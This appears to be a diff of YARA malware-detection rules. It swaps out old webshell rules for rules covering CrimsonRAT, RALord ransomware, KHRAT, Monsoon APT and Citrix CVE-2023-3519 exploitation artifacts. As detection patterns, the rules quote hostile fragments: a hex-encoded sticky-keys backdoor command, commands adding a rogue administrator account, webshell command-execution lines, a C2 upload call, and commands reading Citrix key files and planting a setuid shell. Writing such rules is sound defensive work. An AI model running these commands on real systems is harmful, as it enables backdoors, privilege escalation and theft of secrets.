+		logic_hash = "36710db313a52db2a0c0af356e701d3a36e5597203e87fd7f8586d202738be33"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		company = "Check Point Software Technologies LTD."
 
 	strings:
-		$s0 = "returns=httpopen(\"LoginID=\"&user&\"&FullName=&Password=\"&pass&\"&ComboPasswor" ascii
-		$s1 = "returns=httpopen(\"\",\"POST\",\"http://127.0.0.1:\"&port&\"/Admin/XML/User.xml?" ascii
+		$chunk_1 = {
+
+C7 85 ?? ?? ?? ?? 63 6D 64 2E
+C7 85 ?? ?? ?? ?? 65 78 65 20
+C7 85 ?? ?? ?? ?? 2F 63 20 63
+C7 85 ?? ?? ?? ?? 6F 70 79 20
+C7 85 ?? ?? ?? ?? 25 77 69 6E
+C7 85 ?? ?? ?? ?? 64 69 72 25
+C7 85 ?? ?? ?? ?? 5C 73 79 73
+C7 85 ?? ?? ?? ?? 74 65 6D 33
+C7 85 ?? ?? ?? ?? 32 5C 63 6D
+C7 85 ?? ?? ?? ?? 64 2E 65 78
+C7 85 ?? ?? ?? ?? 65 20 25 77
+C7 85 ?? ?? ?? ?? 69 6E 64 69
+C7 85 ?? ?? ?? ?? 72 25 5C 73
+C7 85 ?? ?? ?? ?? 79 73 74 65
+C7 85 ?? ?? ?? ?? 6D 33 32 5C
+C7 85 ?? ?? ?? ?? 73 65 74 68
+C7 85 ?? ?? ?? ?? 63 2E 65 78
+C7 85 ?? ?? ?? ?? 65 20 2F 79
+83 A5 ?? ?? ?? ?? 00
+}
+		$chunk_2 = {
+
+C7 85 ?? ?? ?? ?? 63 6D 64 20
+C7 85 ?? ?? ?? ?? 2F 63 20 22
+C7 85 ?? ?? ?? ?? 6E 65 74 20
+C7 85 ?? ?? ?? ?? 75 73 65 72
+C7 85 ?? ?? ?? ?? 20 63 65 73
+C7 85 ?? ?? ?? ?? 73 75 70 70
+C7 85 ?? ?? ?? ?? 6F 72 74 20
+C7 85 ?? ?? ?? ?? 31 71 61 7A
+C7 85 ?? ?? ?? ?? 23 45 44 43
+C7 85 ?? ?? ?? ?? 20 2F 61 64
+C7 85 ?? ?? ?? ?? 64 20 26 26
+C7 85 ?? ?? ?? ?? 20 6E 65 74
+C7 85 ?? ?? ?? ?? 20 6C 6F 63
+C7 85 ?? ?? ?? ?? 61 6C 67 72
+C7 85 ?? ?? ?? ?? 6F 75 70 20
+C7 85 ?? ?? ?? ?? 61 64 6D 69
+C7 85 ?? ?? ?? ?? 6E 69 73 74
+C7 85 ?? ?? ?? ?? 72 61 74 6F
+C7 85 ?? ?? ?? ?? 72 73 20 63
+C7 85 ?? ?? ?? ?? 65 73 73 75
+C7 85 ?? ?? ?? ?? 70 70 6F 72
+C7 85 ?? ?? ?? ?? 74 20 2F 61
+C7 85 ?? ?? ?? ?? 64 64 22 00
+6A 5C
+
+}
+		$chunk_3 = {
+
+C7 45 ?? 57 69 6E 45
+C7 45 ?? 78 65 63 00
+C7 45 ?? 47 65 74 50
+C7 45 ?? 72 6F 63 41
+C7 45 ?? 64 64 72 65
+C7 45 ?? 73 73 00 00
+C7 45 ?? 43 72 65 61
+C7 45 ?? 74 65 46 69
+C7 45 ?? 6C 65 41 00
+C7 45 ?? 57 72 69 74
+C7 45 ?? 65 46 69 6C
+C7 45 ?? 65 00 00 00
+C7 45 ?? 43 6C 6F 73
+C7 45 ?? 65 48 61 6E
+C7 45 ?? 64 6C 65 00
+89 4D ??
+
+}
 
 	condition:
-		filesize < 59KB and all of them
+		any of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Cfmshell : FILE
+rule SIGNATURE_BASE_Crimsonrat_Mar18_1 : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file cfmShell.cfm"
+		description = "Detects CrimsonRAT malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40d50ddb-2963-5d8e-b93a-bb44a8944229"
-		date = "2015-06-23"
+		id = "af21876c-f99d-5307-abba-02c57ee93df0"
+		date = "2018-03-06"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L565-L580"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_crimson_rat.yar#L11-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "740796909b5d011128b6c54954788d14faea9117"
-		logic_hash = "0767012ec8fd4a18a64eca04d459efb55fafd29ed052dab8a0eb1b8f4ce7aa66"
-		score = 70
+		logic_hash = "59b01a98a70c4bac08d396418fac24eb96e461a45502f63edc2a9aa87e05f960"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "acf2e8013b6fafcf436d5a05049896504ffa2e982bca05155d19981d1931c611"
+		hash2 = "7ca6e5ef1d346ec35993c910128a3526b098a07445131784a9358bf5679e3975"
+		hash3 = "be4264973de9886caedae1cb707586588d0da85ac7a2ad277db4258033ea12a8"
+		hash4 = "acf2e8013b6fafcf436d5a05049896504ffa2e982bca05155d19981d1931c611"
+		hash5 = "ff52b4a64ed7caeab00350e493968dbdb159aeb545fcba67d83ab9b158464de4"
 
 	strings:
-		$s0 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii
-		$s4 = "<cfif FileExists(\"#GetTempDirectory()#foobar.txt\") is \"Yes\">" fullword ascii
+		$x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|" wide
+		$x2 = "\\Release\\RTLBot.pdb" ascii
+		$x3 = "cmd.exe/c systeminfo >> 1.txt" fullword wide
+		$x4 = "/online >> Get online target with important info" fullword wide
+		$x5 = "/screen >> ScreenShot from target PC" fullword wide
+		$x6 = "/restart >> Restart Target PC" fullword wide
+		$x7 = "/log_key >> Get log key file" fullword wide
+		$a1 = "get_ShiftKey" fullword ascii
+		$a2 = "get_ControlKey" fullword ascii
+		$a3 = "get_AltKey" fullword ascii
+		$a4 = "get_MineInterval" fullword ascii
+		$fp1 = "Copyright Software Secure" wide
 
 	condition:
-		filesize < 4KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or all of ( $a* ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp4 : FILE
+rule SIGNATURE_BASE_MAL_WIN_Ralordv1_Apr25 : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file asp4.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4125bb40-3f5c-53f5-b906-54fa77b119f5"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L582-L598"
+		description = "This ISH Tecnologia Yara rule, detects the main components of the first version of RALord Ransomware"
+		author = "0x0d4y-Icaro Cesar"
+		id = "67254633-3597-4770-9806-8b2e26c8f66a"
+		date = "2025-04-01"
+		modified = "2025-04-18"
+		reference = "https://ish.com.br/wp-content/uploads/2025/04/RALord-Novo-grupo-de-Ransomware-as-a-Service-1.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ralordv1_win_ap25.yar#L1-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4005b83ced1c032dc657283341617c410bc007b8"
-		logic_hash = "ae02d1efc975a8592a00cbab823355fb778fbb589f5752dd913aa432b316c3a4"
-		score = 70
+		hash = "be15f62d14d1cbe2aecce8396f4c6289"
+		logic_hash = "75d20cca5eb48109bbb3b0ab0ce2efb4f2d89bc1984df8c4fddf1f859d069750"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
+		malpedia_family = "win.ralord"
 
 	strings:
-		$s2 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii
-		$s6 = "Response.Cookies(Cookie_Login) = sPwd" fullword ascii
-		$s8 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
+		$code_pattern_quarterround = { 4? 31 ?? 48 8b ?? ?? ?? 4? 31 ?? 48 8b ?? ?? ?? 31 e8 4? 31 ?? 41 c1 ?? 0c c1 ?? 0c c1 ?? 0c 48 89 c2 c1 ?? 0c }
+		$code_pattern_custom_alg = { 0f 57 ?? 0f 10 ?? c5 ?? ?? ?? ?? 0f 57 ?? 0f 10 ?? c5 ?? ?? ?? ?? 0f 57 ?? 0f 10 ?? c5 ?? ?? ?? ?? 0f 57 ?? 0f 11 ?? c5 ?? ?? ?? ?? 0f 11 ?? c5 ?? ?? ?? ?? 0f 11 ?? c5 ?? ?? ?? ?? 0f 11 ?? c5 ?? ?? ?? ?? 48 83 c0 08 48 3d 8? }
+		$ralord_str_I = "chacha" ascii
+		$ralord_str_II = "scorp" ascii
+		$ralord_str_III = "RALord" ascii
+		$ralord_str_IV = "onion" ascii
+		$ralord_str_V = "/rust" ascii
+		$ralord_str_VI = "BCryptGenRandom" ascii
 
 	condition:
-		filesize < 150KB and all of them
+		uint16( 0 ) == 0x5a4d and all of ( $code_pattern_* ) and 4 of ( $ralord_str_* )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_2_Admin_By_Lake2 : FILE
+
+rule SIGNATURE_BASE_KHRAT_Malware : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file Serv-U 2 admin by lake2.asp"
+		description = "Detects an Imphash of KHRAT malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8fce8835-a4ed-58df-a725-0c1fc04becaa"
-		date = "2015-06-23"
+		id = "3e6a5aca-9898-5864-8974-ca4adf272893"
+		date = "2017-08-31"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L600-L617"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_khrat.yar#L13-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cb8039f213e611ab2687edd23e63956c55f30578"
-		logic_hash = "a67c08b3a4bed2385d2fa8c007615bfb37a2d739cc13ee2e0f5eda00536b6ea8"
-		score = 70
+		logic_hash = "cfc1a9fb4dbec4deb70616ab7c4cce3cf56429f61fd36f78245621527d011e20"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "xPost3.Open \"POST\", \"http://127.0.0.1:\"& port &\"/lake2\", True" fullword ascii
-		$s2 = "response.write \"FTP user lake  pass admin123 :)<br><BR>\"" fullword ascii
-		$s8 = "<p>Serv-U Local Get SYSTEM Shell with ASP" fullword ascii
-		$s9 = "\"-HomeDir=c:\\\\\" & vbcrlf & \"-LoginMesFile=\" & vbcrlf & \"-Disable=0\" & vb" ascii
+		hash1 = "53e27fd13f26462a58fa5587ecd244cab4da23aa80cf0ed6eb5ee9f9de2688c1"
 
 	condition:
-		filesize < 17KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "6a8478ad861f98f8428a042f74de1944"
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php3 : FILE
+rule SIGNATURE_BASE_MAL_KHRAT_Script
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php3.txt"
+		description = "Rule derived from KHRAT script but can match on other malicious scripts as well"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3000ac40-35de-5d24-85fb-4d105b07c2e7"
-		date = "2015-06-23"
+		id = "fd345647-4887-560e-a6b2-129a880026aa"
+		date = "2017-08-31"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L619-L634"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_khrat.yar#L26-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e2924cb0537f4cdfd6f1bd44caaaf68a73419b9d"
-		logic_hash = "ba3892feacbbe3d7c6b6308a22ca22b19ae84b6490df2c976852260da2a96ca1"
-		score = 70
+		logic_hash = "c27a89028794b50b95850d90ee29b56606e6b58b862a26e287077e7f7be7f096"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8c88b4177b59f4cac820b0019bcc7f6d3d50ce4badb689759ab0966780ae32e3"
 
 	strings:
-		$s1 = "} elseif(@is_resource($f = @popen($cfe,\"r\"))) {" fullword ascii
-		$s2 = "cf('/tmp/.bc',$back_connect);" fullword ascii
+		$x1 = "CreateObject(\"WScript.Shell\").Run \"schtasks /create /sc MINUTE /tn" ascii
+		$x2 = "CreateObject(\"WScript.Shell\").Run \"rundll32.exe javascript:\"\"\\..\\mshtml,RunHTMLApplication" ascii
+		$x3 = "<registration progid=\"ff010f\" classid=\"{e934870c-b429-4d0d-acf1-eef338b92c4b}\" >" fullword ascii
 
 	condition:
-		filesize < 8KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_By_Goldsun : FILE
+rule SIGNATURE_BASE_MAL_KHRAT_Scritplet : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file Serv-U_by_Goldsun.asp"
+		description = "Rule derived from KHRAT scriptlet"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d8b85c33-b05d-531a-9c0a-a1dddcae0da4"
-		date = "2015-06-23"
+		id = "f72d68a3-0409-5401-b6a1-ca8f188d7409"
+		date = "2017-08-31"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L636-L653"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_khrat.yar#L43-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d4d7a632af65a961a1dbd0cff80d5a5c2b397e8c"
-		logic_hash = "962b2e75c03f716fc039cf26aa238e9a3faf5a7ea8fb3d4da556fa601790055a"
-		score = 70
+		logic_hash = "cbbabd8e2f17827d96aeef4ea362f133cf3fcc31716c517b86a05a010ff62510"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cdb9104636a6f7c6018fe99bc18fb8b542689a84c23c10e9ea13d5aa275fd40e"
 
 	strings:
-		$s1 = "b.open \"GET\", \"http://127.0.0.1:\" & ftpport & \"/goldsun/upadmin/s2\", True," ascii
-		$s2 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii
-		$s3 = "127.0.0.1:<%=port%>," fullword ascii
-		$s4 = "GName=\"http://\" & request.servervariables(\"server_name\")&\":\"&request.serve" ascii
+		$x1 = "http.open \"POST\", \"http://update.upload-dropbox[.]com/docs/tz/GetProcess.php\",False,\"\",\"\" " fullword ascii
+		$x2 = "Process=Process & Chr(32) & Chr(32) & Chr(32) & Obj.Description" fullword ascii
+		$s1 = "http.SetRequestHeader \"Content-Type\", \"application/json\" " fullword ascii
+		$s2 = "Dim http,WMI,Objs,Process" fullword ascii
+		$s3 = "Set Objs=WMI.InstancesOf(\"Win32_Process\")" fullword ascii
+		$s4 = "'WScript.Echo http.responseText " fullword ascii
 
 	condition:
-		filesize < 30KB and 2 of them
+		uint16( 0 ) == 0x3f3c and filesize < 1KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php10 : FILE
+
+rule SIGNATURE_BASE_Monsoon_APT_Malware_1 : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php10.txt"
+		description = "Detects malware from Monsoon APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5fe78cc6-8be3-595f-a082-e361259938e5"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L655-L670"
+		id = "a543c46d-01fc-5276-a915-183263956455"
+		date = "2017-09-08"
+		modified = "2023-01-06"
+		reference = "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_monsoon.yar#L14-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3698c566a0ae07234c8957112cdb34b79362b494"
-		logic_hash = "76bb2dfd518173f031cc3c93b2098edaef4aca09f0dd8228223257b0b7df452b"
-		score = 70
+		logic_hash = "76580f999d445f4baace5287a3038e294f8be3783289d6c7c5b2c0c92c39db86"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c9642f44d33e4c990066ce6fa0b0956ff5ace6534b64160004df31b9b690c9cd"
 
 	strings:
-		$s1 = "dumpTable($N,$M,$Hc=false){if($_POST[\"format\"]!=\"sql\"){echo\"\\xef\\xbb\\xbf" ascii
-		$s2 = "';if(DB==\"\"||!$od){echo\"<a href='\".h(ME).\"sql='\".bold(isset($_GET[\"sql\"]" ascii
+		$s1 = "cmd.exe /c start " fullword ascii
+		$s2 = "\\Microsoft\\Templates\\" ascii
+		$s3 = "\\Microsoft\\Windows\\" ascii
 
 	condition:
-		filesize < 600KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a0c824244f1d36ea1dd2759cf7599cd1" or all of them ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_Servu : FILE
+rule SIGNATURE_BASE_Monsoon_APT_Malware_2 : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file servu.php"
+		description = "Detects malware from Monsoon APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3e50d991-7297-5766-b68a-e74aa34ce042"
-		date = "2015-06-23"
+		id = "dbbccf56-7e36-5c3a-b8d9-ee08d077f29f"
+		date = "2017-09-08"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L671-L686"
+		reference = "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_monsoon.yar#L37-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7de701b86820096e486e64ca34f1fa9f2fbba641"
-		logic_hash = "d3956b6daa0649233372aea4176e0d43c44d866146884222f92b7efe01f288bb"
-		score = 70
+		logic_hash = "20552573102dd981c81ffa6a8c7bbdfafc9bbb7da1fbc12f273bca7d6a0c9d05"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "17c3d0fe08e1184c9737144fa065f4530def30d6591e5414a36463609f9aa53a"
+		hash2 = "8e0574ebf3dc640ac82987ab6ee2a02fc3dd5eaf4f6b5275272ba887acd15ac0"
+		hash3 = "bf93ca5f497fc7f38533d37fd4c083523ececc34aa2d3660d81014c0d9091ae3"
 
 	strings:
-		$s0 = "fputs ($conn_id, \"SITE EXEC \".$dir.\"cmd.exe /c \".$cmd.\"\\r\\n\");" fullword ascii
-		$s1 = "function ftpcmd($ftpport,$user,$password,$dir,$cmd){" fullword ascii
+		$x1 = "\\Microsoft\\Windows\\coco.exe" ascii
+		$x2 = ":\\System Volume Information\\config" fullword ascii
+		$x3 = " cscript.[BACKSPA[PAGE DO[CAPS LO[PAGE UPTPX498.dTPX499.d" fullword wide
+		$s1 = "\\Microsoft\\Templates\\msvcrt.dll" ascii
+		$s2 = "%04d/%02d/%02d %02d:%02d:%02d - {%s}" fullword wide
+		$s3 = "wininet.dll    " fullword ascii
+		$s4 = "DMCZ0001.dat" fullword ascii
+		$s5 = "TZ0000001.dat" fullword ascii
+		$s6 = "\\MUT.dat" ascii
+		$s7 = "ouemm/emm!!!!!!!!!!!!!" fullword ascii
 
 	condition:
-		filesize < 41KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of them ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Portrecall_Jsp2 : FILE
+rule SIGNATURE_BASE_EXPL_Citrix_Netscaler_ADC_Forensicartifacts_CVE_2023_3519_Jul23_2 : CVE_2023_3519 FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file jsp2.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cd34cb47-c5e0-5094-a501-6a8a00d94018"
-		date = "2015-06-23"
+		description = "Detects forensic artifacts found after an exploitation of Citrix NetScaler ADC CVE-2023-3519"
+		author = "Florian Roth"
+		id = "471ce547-0133-5836-b9d1-02c932ecfd1e"
+		date = "2023-07-21"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L688-L704"
+		reference = "https://www.cisa.gov/sites/default/files/2023-07/aa23-201a_csa_threat_actors_exploiting_citrix-cve-2023-3519_to_implant_webshells.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L27-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "412ed15eb0d24298ba41731502018800ffc24bfc"
-		logic_hash = "1ec77a1b0d30cdebce1b5b07445247016230b733a594d8d1de642c2c8af63031"
+		logic_hash = "48d4225d0935084003f7a98c554d7c4722a91290dfe190001da52bce332b3f7d"
 		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-3519, FILE"
 
 	strings:
-		$s0 = "final String remoteIP =request.getParameter(\"remoteIP\");" fullword ascii
-		$s4 = "final String localIP = request.getParameter(\"localIP\");" fullword ascii
-		$s20 = "final String localPort = \"3390\";//request.getParameter(\"localPort\");" fullword ascii
+		$s1 = "tar -czvf - /var/tmp/all.txt" ascii fullword
+		$s2 = "-out /var/tmp/test.tar.gz" ascii
+		$s3 = "/test.tar.gz /netscaler/"
 
 	condition:
-		filesize < 23KB and all of them
+		filesize < 10MB and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx2 : FILE
+rule SIGNATURE_BASE_EXPL_Citrix_Netscaler_ADC_Forensicartifacts_CVE_2023_3519_Jul23_3 : CVE_2023_3519 FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file aspx2.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0da59fde-2214-5677-943f-05b8da4fd9d4"
-		date = "2015-06-23"
+		description = "Detects forensic artifacts found after an exploitation of Citrix NetScaler ADC CVE-2023-3519"
+		author = "Florian Roth"
+		id = "2f40b423-f1da-5711-ac4f-18de77cd52d0"
+		date = "2023-07-24"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L706-L723"
+		reference = "https://www.mandiant.com/resources/blog/citrix-zero-day-espionage"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L43-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "95db7a60f4a9245ffd04c4d9724c2745da55e9fd"
-		logic_hash = "7af90992bc3f708d877dcd5841c0d132793e41a0796607907084516d955b3ae0"
+		logic_hash = "e78e1a788503b841ed0f4e5cd415eb35d8911092778120d7fd061ed20820da37"
 		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-3519, FILE"
 
 	strings:
-		$s0 = "if (password.Equals(this.txtPass.Text))" fullword ascii
-		$s1 = "<head runat=\"server\">" fullword ascii
-		$s2 = ":<asp:TextBox runat=\"server\" ID=\"txtPass\" Width=\"400px\"></asp:TextBox>" fullword ascii
-		$s3 = "this.lblthispath.Text = Server.MapPath(Request.ServerVariables[\"PATH_INFO\"]);" fullword ascii
+		$x1 = "cat /flash/nsconfig/ns.conf >>" ascii
+		$x2 = "cat /nsconfig/.F1.key >>" ascii
+		$x3 = "openssl base64 -d < /tmp/" ascii
+		$x4 = "cp /usr/bin/bash /var/tmp/bash" ascii
+		$x5 = "chmod 4775 /var/tmp/bash"
+		$x6 = "pwd;pwd;pwd;pwd;pwd;"
+		$x7 = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))"
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 9KB and all of them
+		filesize < 10MB and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Hy2006A : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Citrix_Netscaler_ADC_Exploitation_Attempt_CVE_2023_3519_Jul23_1 : CVE_2023_3519
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file hy2006a.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "115651d3-63e1-58e3-b27c-42271111bb91"
-		date = "2015-06-23"
+		description = "This YARA rule detects forensic artifacts that appear following an attempted exploitation of Citrix NetScaler ADC CVE-2023-3519. The rule identifies an attempt to access the vulnerable function using an overly long URL, a potential sign of attempted exploitation. However, it does not confirm whether such an attempt was successful."
+		author = "Florian Roth"
+		id = "7dfe4130-d976-5d6d-a05d-ccadefe45406"
+		date = "2023-07-27"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L725-L740"
+		reference = "https://blog.assetnote.io/2023/07/24/citrix-rce-part-2-cve-2023-3519/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L63-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "20da92b2075e6d96636f883dcdd3db4a38c01090"
-		logic_hash = "a24bf11a2728bb8d18ea005b057648770956694e0b257d4464ad15ee3e24eda2"
-		score = 70
+		logic_hash = "7ad3164c5b2616b12a513a2bb3736d530769e75fca03346a72351a27b8343b2a"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-3519"
 
 	strings:
-		$s15 = "Const myCmdDotExeFile = \"command.com\"" fullword ascii
-		$s16 = "If LCase(appName) = \"cmd.exe\" And appArgs <> \"\" Then" fullword ascii
+		$sr1 = /GWTEST FORMS SSO: Parse=0; URLLEN=([2-9][0-9]{2}|[0-9]{4,20}); Event: start=0x/
+		$s1 = ", type=1; Target: start=0x"
 
 	condition:
-		filesize < 406KB and all of them
+		all of them
 }
